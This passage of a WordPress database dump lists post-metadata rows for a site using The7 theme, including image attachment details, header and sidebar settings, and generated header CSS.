(8596,2575,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:233;s:6:\"height\";i:231;s:4:\"file\";s:16:\"2022/10/mws5.jpg\";s:8:\"filesize\";i:83460;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"mws5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7416;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(8597,2574,'_thumbnail_id','2575'),
(8598,2574,'_edit_last','1'),
(8599,2574,'_wpb_vc_js_status','true'),
(8600,2574,'_dt_sidebar_position','disabled'),
(8601,2574,'_dt_sidebar_widgetarea_id','sidebar_1'),
(8602,2574,'_dt_sidebar_hide_on_mobile','0'),
(8603,2574,'_dt_footer_show','1'),
(8604,2574,'_dt_footer_widgetarea_id','sidebar_2'),
(8605,2574,'_dt_footer_hide_on_mobile','0'),
(8606,2574,'_dt_header_title','fancy'),
(8607,2574,'_dt_header_background','normal'),
(8608,2574,'_dt_header_background_below_slideshow','disabled'),
(8609,2574,'_dt_header_transparent_bg_color_scheme','light'),
(8610,2574,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(8611,2574,'_dt_header_transparent_top_bar_bg_opacity','25'),
(8612,2574,'_dt_header_transparent_bg_color','#000000'),
(8613,2574,'_dt_header_transparent_bg_opacity','50'),
(8614,2574,'_dt_header_disabled_background','normal'),
(8615,2574,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(8616,2574,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(8617,2574,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(8618,2574,'_dt_header_disabled_transparent_bg_color','#000000'),
(8619,2574,'_dt_header_disabled_transparent_bg_opacity','50'),
(8620,2574,'_dt_page_overrides_top_margin',''),
(8621,2574,'_dt_page_overrides_right_margin',''),
(8622,2574,'_dt_page_overrides_bottom_margin',''),
(8623,2574,'_dt_page_overrides_left_margin',''),
(8624,2574,'_dt_mobile_page_padding_top',''),
(8625,2574,'_dt_mobile_page_padding_right',''),
(8626,2574,'_dt_mobile_page_padding_bottom',''),
(8627,2574,'_dt_mobile_page_padding_left',''),
(8628,2574,'_dt_fancy_header_layout_heading',''),
(8629,2574,'_dt_fancy_header_title_aligment','center'),
(8630,2574,'_dt_fancy_header_height','300'),
(8631,2574,'_dt_fancy_header_padding-top','0px'),
(8632,2574,'_dt_fancy_header_padding-bottom','0px'),
(8633,2574,'_dt_fancy_header_breadcrumbs_heading',''),
(8634,2574,'_dt_fancy_header_breadcrumbs','disabled'),
(8635,2574,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(8636,2574,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(8637,2574,'_dt_fancy_header_title_heading',''),
(8638,2574,'_dt_fancy_header_title_mode','custom'),
(8639,2574,'_dt_fancy_header_title',''),
(8640,2574,'_dt_fancy_header_title_font_size','30'),
(8641,2574,'_dt_fancy_header_title_line_height','36'),
(8642,2574,'_dt_fancy_header_text_transform','none'),
(8643,2574,'_dt_fancy_header_title_color_mode','color'),
(8644,2574,'_dt_fancy_header_title_color','#ffffff'),
(8645,2574,'_dt_fancy_header_subtitle_heading',''),
(8646,2574,'_dt_fancy_header_subtitle',''),
(8647,2574,'_dt_fancy_header_subtitle_font_size','18'),
(8648,2574,'_dt_fancy_header_subtitle_line_height','26'),
(8649,2574,'_dt_fancy_header_subtitle_text_transform','none'),
(8650,2574,'_dt_fancy_header_subtitle_color_mode','color'),
(8651,2574,'_dt_fancy_header_subtitle_color','#ffffff'),
(8652,2574,'_dt_fancy_header_bg_heading',''),
(8653,2574,'_dt_fancy_header_bg_color','#222222'),
(8654,2574,'_dt_fancy_header_bg_image_origin','featured_image'),
(8655,2574,'_dt_fancy_header_bg_image','a:0:{}'),
(8656,2574,'_dt_fancy_header_bg_repeat','no-repeat'),
(8657,2574,'_dt_fancy_header_bg_position_x','center'),
(8658,2574,'_dt_fancy_header_bg_position_y','center'),
(8659,2574,'_dt_fancy_header_bg_fullscreen','1'),
(8660,2574,'_dt_fancy_header_bg_overlay','0'),
(8661,2574,'_dt_fancy_header_overlay_color','#000'),
(8662,2574,'_dt_fancy_header_bg_overlay_opacity','50'),
(8663,2574,'_dt_fancy_header_scroll_effect','default'),
(8664,2574,'_dt_fancy_header_bg_parallax','0.5'),
(8665,2574,'_dt_fancy_header_responsiveness_heading',''),
(8666,2574,'_dt_fancy_header_responsiveness','enabled'),
(8667,2574,'_dt_fancy_header_responsiveness_switch','778px'),
(8668,2574,'_dt_fancy_header_responsive_height','70'),
(8669,2574,'_dt_fancy_header_responsive_font_size','30'),
(8670,2574,'_dt_fancy_header_responsive_title_line_height','38'),
(8671,2574,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(8672,2574,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(8673,2574,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(8674,2574,'_dt_project_options_back_button',''),
(8675,2574,'_dt_project_options_show_link',''),
(8676,2574,'_dt_project_options_link',''),
(8677,2574,'_dt_project_options_link_target',''),
(8678,2574,'_dt_project_options_link_name',''),
(8679,2574,'_dt_project_options_hide_thumbnail','1'),
(8680,2574,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(8681,2574,'_dt_project_options_related_mode','same'),
(8682,2574,'_dt_project_options_preview','normal'),
(8683,2574,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/10/mws5.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(8684,2577,'_edit_lock','1675596062:1'),
(8685,2578,'_wp_attached_file','2022/10/mws6.jpg'),
(8686,2578,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:469;s:6:\"height\";i:270;s:4:\"file\";s:16:\"2022/10/mws6.jpg\";s:8:\"filesize\";i:138095;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"mws6-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15369;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"mws6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7075;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(8687,2577,'_thumbnail_id','2578'),
(8688,2577,'_edit_last','1'),
(8689,2577,'_wpb_vc_js_status','true'),
(8690,2577,'_dt_sidebar_position','disabled'),
(8691,2577,'_dt_sidebar_widgetarea_id','sidebar_1'),
(8692,2577,'_dt_sidebar_hide_on_mobile','0'),
(8693,2577,'_dt_footer_show','1'),
(8694,2577,'_dt_footer_widgetarea_id','sidebar_2'),
(8695,2577,'_dt_footer_hide_on_mobile','0'),
(8696,2577,'_dt_header_title','fancy'),
(8697,2577,'_dt_header_background','normal'),
(8698,2577,'_dt_header_background_below_slideshow','disabled'),
(8699,2577,'_dt_header_transparent_bg_color_scheme','light'),
(8700,2577,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(8701,2577,'_dt_header_transparent_top_bar_bg_opacity','25'),
(8702,2577,'_dt_header_transparent_bg_color','#000000'),
(8703,2577,'_dt_header_transparent_bg_opacity','50'),
(8704,2577,'_dt_header_disabled_background','normal'),
(8705,2577,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(8706,2577,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(8707,2577,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(8708,2577,'_dt_header_disabled_transparent_bg_color','#000000'),
(8709,2577,'_dt_header_disabled_transparent_bg_opacity','50'),
(8710,2577,'_dt_page_overrides_top_margin',''),
(8711,2577,'_dt_page_overrides_right_margin',''),
(8712,2577,'_dt_page_overrides_bottom_margin',''),
(8713,2577,'_dt_page_overrides_left_margin',''),
(8714,2577,'_dt_mobile_page_padding_top',''),
(8715,2577,'_dt_mobile_page_padding_right',''),
(8716,2577,'_dt_mobile_page_padding_bottom',''),
(8717,2577,'_dt_mobile_page_padding_left',''),
(8718,2577,'_dt_fancy_header_layout_heading',''),
(8719,2577,'_dt_fancy_header_title_aligment','center'),
(8720,2577,'_dt_fancy_header_height','300'),
(8721,2577,'_dt_fancy_header_padding-top','0px'),
(8722,2577,'_dt_fancy_header_padding-bottom','0px'),
(8723,2577,'_dt_fancy_header_breadcrumbs_heading',''),
(8724,2577,'_dt_fancy_header_breadcrumbs','disabled'),
(8725,2577,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(8726,2577,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(8727,2577,'_dt_fancy_header_title_heading',''),
(8728,2577,'_dt_fancy_header_title_mode','custom'),
(8729,2577,'_dt_fancy_header_title',''),
(8730,2577,'_dt_fancy_header_title_font_size','30'),
(8731,2577,'_dt_fancy_header_title_line_height','36'),
(8732,2577,'_dt_fancy_header_text_transform','none'),
(8733,2577,'_dt_fancy_header_title_color_mode','color'),
(8734,2577,'_dt_fancy_header_title_color','#ffffff'),
(8735,2577,'_dt_fancy_header_subtitle_heading',''),
(8736,2577,'_dt_fancy_header_subtitle',''),
(8737,2577,'_dt_fancy_header_subtitle_font_size','18'),
(8738,2577,'_dt_fancy_header_subtitle_line_height','26'),
(8739,2577,'_dt_fancy_header_subtitle_text_transform','none'),
(8740,2577,'_dt_fancy_header_subtitle_color_mode','color'),
(8741,2577,'_dt_fancy_header_subtitle_color','#ffffff'),
(8742,2577,'_dt_fancy_header_bg_heading',''),
(8743,2577,'_dt_fancy_header_bg_color','#222222'),
(8744,2577,'_dt_fancy_header_bg_image_origin','featured_image'),
(8745,2577,'_dt_fancy_header_bg_image','a:0:{}'),
(8746,2577,'_dt_fancy_header_bg_repeat','no-repeat'),
(8747,2577,'_dt_fancy_header_bg_position_x','center'),
(8748,2577,'_dt_fancy_header_bg_position_y','center'),
(8749,2577,'_dt_fancy_header_bg_fullscreen','1'),
(8750,2577,'_dt_fancy_header_bg_overlay','0'),
(8751,2577,'_dt_fancy_header_overlay_color','#000'),
(8752,2577,'_dt_fancy_header_bg_overlay_opacity','50'),
(8753,2577,'_dt_fancy_header_scroll_effect','default'),
(8754,2577,'_dt_fancy_header_bg_parallax','0.5'),
(8755,2577,'_dt_fancy_header_responsiveness_heading',''),
(8756,2577,'_dt_fancy_header_responsiveness','enabled'),
(8757,2577,'_dt_fancy_header_responsiveness_switch','778px'),
(8758,2577,'_dt_fancy_header_responsive_height','70'),
(8759,2577,'_dt_fancy_header_responsive_font_size','30'),
(8760,2577,'_dt_fancy_header_responsive_title_line_height','38'),
(8761,2577,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(8762,2577,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(8763,2577,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(8764,2577,'_dt_project_options_back_button',''),
(8765,2577,'_dt_project_options_show_link',''),
(8766,2577,'_dt_project_options_link',''),
(8767,2577,'_dt_project_options_link_target',''),
(8768,2577,'_dt_project_options_link_name',''),
(8769,2577,'_dt_project_options_hide_thumbnail','1'),
(8770,2577,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(8771,2577,'_dt_project_options_related_mode','same'),
(8772,2577,'_dt_project_options_preview','normal'),
(8773,2577,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/10/mws6.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(8774,2580,'_edit_lock','1675596263:1'),
(8775,2581,'_wp_attached_file','2022/10/mws7.jpg'),
(8776,2581,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:624;s:6:\"height\";i:277;s:4:\"file\";s:16:\"2022/10/mws7.jpg\";s:8:\"filesize\";i:105566;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"mws7-300x133.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:133;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9445;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"mws7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6020;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(8777,2580,'_thumbnail_id','2581'),
(8778,2580,'_edit_last','1'),
(8779,2580,'_wpb_vc_js_status','true'),
(8780,2580,'_dt_sidebar_position','disabled'),
(8781,2580,'_dt_sidebar_widgetarea_id','sidebar_1'),
(8782,2580,'_dt_sidebar_hide_on_mobile','0'),
(8783,2580,'_dt_footer_show','1'),
(8784,2580,'_dt_footer_widgetarea_id','sidebar_2'),
(8785,2580,'_dt_footer_hide_on_mobile','0'),
(8786,2580,'_dt_header_title','fancy'),
(8787,2580,'_dt_header_background','normal'),
(8788,2580,'_dt_header_background_below_slideshow','disabled'),
(8789,2580,'_dt_header_transparent_bg_color_scheme','light'),
(8790,2580,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(8791,2580,'_dt_header_transparent_top_bar_bg_opacity','25'),
(8792,2580,'_dt_header_transparent_bg_color','#000000'),
(8793,2580,'_dt_header_transparent_bg_opacity','50'),
(8794,2580,'_dt_header_disabled_background','normal'),
(8795,2580,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(8796,2580,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(8797,2580,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(8798,2580,'_dt_header_disabled_transparent_bg_color','#000000'),
(8799,2580,'_dt_header_disabled_transparent_bg_opacity','50'),
(8800,2580,'_dt_page_overrides_top_margin',''),
(8801,2580,'_dt_page_overrides_right_margin',''),
(8802,2580,'_dt_page_overrides_bottom_margin',''),
(8803,2580,'_dt_page_overrides_left_margin',''),
(8804,2580,'_dt_mobile_page_padding_top',''),
(8805,2580,'_dt_mobile_page_padding_right',''),
(8806,2580,'_dt_mobile_page_padding_bottom',''),
(8807,2580,'_dt_mobile_page_padding_left',''),
(8808,2580,'_dt_fancy_header_layout_heading',''),
(8809,2580,'_dt_fancy_header_title_aligment','center'),
(8810,2580,'_dt_fancy_header_height','300'),
(8811,2580,'_dt_fancy_header_padding-top','0px'),
(8812,2580,'_dt_fancy_header_padding-bottom','0px'),
(8813,2580,'_dt_fancy_header_breadcrumbs_heading',''),
(8814,2580,'_dt_fancy_header_breadcrumbs','disabled'),
(8815,2580,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(8816,2580,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(8817,2580,'_dt_fancy_header_title_heading',''),
(8818,2580,'_dt_fancy_header_title_mode','custom'),
(8819,2580,'_dt_fancy_header_title',''),
(8820,2580,'_dt_fancy_header_title_font_size','30'),
(8821,2580,'_dt_fancy_header_title_line_height','36'),
(8822,2580,'_dt_fancy_header_text_transform','none'),
(8823,2580,'_dt_fancy_header_title_color_mode','color'),
(8824,2580,'_dt_fancy_header_title_color','#000000'),
(8825,2580,'_dt_fancy_header_subtitle_heading',''),
(8826,2580,'_dt_fancy_header_subtitle',''),
(8827,2580,'_dt_fancy_header_subtitle_font_size','18'),
(8828,2580,'_dt_fancy_header_subtitle_line_height','26'),
(8829,2580,'_dt_fancy_header_subtitle_text_transform','none'),
(8830,2580,'_dt_fancy_header_subtitle_color_mode','color'),
(8831,2580,'_dt_fancy_header_subtitle_color','#ffffff'),
(8832,2580,'_dt_fancy_header_bg_heading',''),
(8833,2580,'_dt_fancy_header_bg_color','#222222'),
(8834,2580,'_dt_fancy_header_bg_image_origin','featured_image'),
(8835,2580,'_dt_fancy_header_bg_image','a:0:{}'),
(8836,2580,'_dt_fancy_header_bg_repeat','no-repeat'),
(8837,2580,'_dt_fancy_header_bg_position_x','center'),
(8838,2580,'_dt_fancy_header_bg_position_y','center'),
(8839,2580,'_dt_fancy_header_bg_fullscreen','1'),
(8840,2580,'_dt_fancy_header_bg_overlay','0'),
(8841,2580,'_dt_fancy_header_overlay_color','#000'),
(8842,2580,'_dt_fancy_header_bg_overlay_opacity','50'),
(8843,2580,'_dt_fancy_header_scroll_effect','default'),
(8844,2580,'_dt_fancy_header_bg_parallax','0.5'),
(8845,2580,'_dt_fancy_header_responsiveness_heading',''),
(8846,2580,'_dt_fancy_header_responsiveness','enabled'),
(8847,2580,'_dt_fancy_header_responsiveness_switch','778px'),
(8848,2580,'_dt_fancy_header_responsive_height','70'),
(8849,2580,'_dt_fancy_header_responsive_font_size','30'),
(8850,2580,'_dt_fancy_header_responsive_title_line_height','38'),
(8851,2580,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(8852,2580,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(8853,2580,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(8854,2580,'_dt_project_options_back_button',''),
(8855,2580,'_dt_project_options_show_link',''),
(8856,2580,'_dt_project_options_link',''),
(8857,2580,'_dt_project_options_link_target',''),
(8858,2580,'_dt_project_options_link_name',''),
(8859,2580,'_dt_project_options_hide_thumbnail','1'),
(8860,2580,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(8861,2580,'_dt_project_options_related_mode','same'),
(8862,2580,'_dt_project_options_preview','normal'),
(8863,2580,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/10/mws7.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #000000;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(8864,2583,'_wp_attached_file','2022/10/mws4.jpg'),
(8865,2583,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:322;s:6:\"height\";i:196;s:4:\"file\";s:16:\"2022/10/mws4.jpg\";s:8:\"filesize\";i:114322;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"mws4-300x183.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16415;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"mws4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7969;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(8866,2570,'_thumbnail_id','2585'),
(8867,2585,'_wp_attached_file','2022/10/mws2.jpg'),
(8868,2585,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:540;s:6:\"height\";i:303;s:4:\"file\";s:16:\"2022/10/mws2.jpg\";s:8:\"filesize\";i:295217;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"mws2-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13829;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"mws2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7128;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(8869,2572,'_thumbnail_id','2583'),
(8870,2586,'_edit_lock','1675596436:1'),
(8871,2587,'_wp_attached_file','2022/10/mws8.jpg'),
(8872,2587,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:585;s:6:\"height\";i:183;s:4:\"file\";s:16:\"2022/10/mws8.jpg\";s:8:\"filesize\";i:118864;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"mws8-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10637;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"mws8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6998;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(8873,2586,'_thumbnail_id','2587'),
(8874,2586,'_edit_last','1'),
(8875,2586,'_wpb_vc_js_status','true'),
(8876,2586,'_dt_sidebar_position','disabled'),
(8877,2586,'_dt_sidebar_widgetarea_id','sidebar_1'),
(8878,2586,'_dt_sidebar_hide_on_mobile','0'),
(8879,2586,'_dt_footer_show','1'),
(8880,2586,'_dt_footer_widgetarea_id','sidebar_2'),
(8881,2586,'_dt_footer_hide_on_mobile','0'),
(8882,2586,'_dt_header_title','fancy'),
(8883,2586,'_dt_header_background','normal'),
(8884,2586,'_dt_header_background_below_slideshow','disabled'),
(8885,2586,'_dt_header_transparent_bg_color_scheme','light'),
(8886,2586,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(8887,2586,'_dt_header_transparent_top_bar_bg_opacity','25'),
(8888,2586,'_dt_header_transparent_bg_color','#000000'),
(8889,2586,'_dt_header_transparent_bg_opacity','50'),
(8890,2586,'_dt_header_disabled_background','normal'),
(8891,2586,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(8892,2586,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(8893,2586,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(8894,2586,'_dt_header_disabled_transparent_bg_color','#000000'),
